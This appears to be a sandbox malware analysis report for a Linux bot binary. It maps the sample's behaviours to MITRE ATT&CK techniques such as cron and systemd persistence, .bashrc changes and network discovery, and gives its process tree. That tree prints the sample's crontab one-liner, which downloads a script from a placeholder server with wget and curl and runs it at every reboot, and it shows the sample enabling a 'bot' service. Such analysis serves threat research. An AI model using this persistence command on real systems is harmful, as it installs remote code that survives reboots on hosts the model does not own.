934af9b9bf9838d64d44911f92190a6742d152a421ed1a74762fb41b93f7366d

persistence privilege_escalation defense_evasion

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.0MZJF6	crontab

Creates/modifies environment variables 1 TTPs 1 IoCs

Creating/modifying environment variables is a common persistence mechanism.

Path Interception by PATH Environment Variable

T1574.007

description	ioc	Process
File opened for modification	/root/.bashrc	x86_64.elf

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

persistence privilege_escalation

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	x86_64.elf

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/bot.service	x86_64.elf

Modifies Bash startup script 2 TTPs 1 IoCs

persistence

Boot or Logon Autostart Execution

T1547

Unix Shell Configuration Modification

T1546.004

description	ioc	Process
File opened for modification	/root/.bashrc	x86_64.elf

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	/bin/sh	1569	x86_64.elf

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	x86_64.elf

Reads runtime system information 1 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	systemctl

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

System Network Configuration Discovery

T1016

pid	Process
1580	curl

/tmp/x86_64.elf
/tmp/x86_64.elf
1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Enumerates active TCP sockets
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads system network configuration
PID:1569
- /bin/sh
  sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
  2⤵
  - File and Directory Permissions Modification
  PID:1574
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:1576
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:1577
- - /usr/bin/chmod
    chmod +x bins.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1578
- - /usr/bin/sh
    sh bins.sh
    3⤵
    PID:1579
- - /bin/curl
    /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
    3⤵
    - System Network Configuration Discovery
    PID:1580
- - /usr/bin/chmod
    chmod +x bins.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1582
- - /usr/bin/sh
    sh bins.sh
    3⤵
    PID:1575
- /bin/sh
  sh -c "/bin/systemctl enable bot"
  2⤵
  PID:1583
- - /bin/systemctl
    /bin/systemctl enable bot
    3⤵
    - Reads runtime system information
    PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Persistence

Boot or Logon Autostart Execution

2

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Boot or Logon Autostart Execution

2

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

Impair Defenses

Credential Access

Discovery

System Network Configuration Discovery

2

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery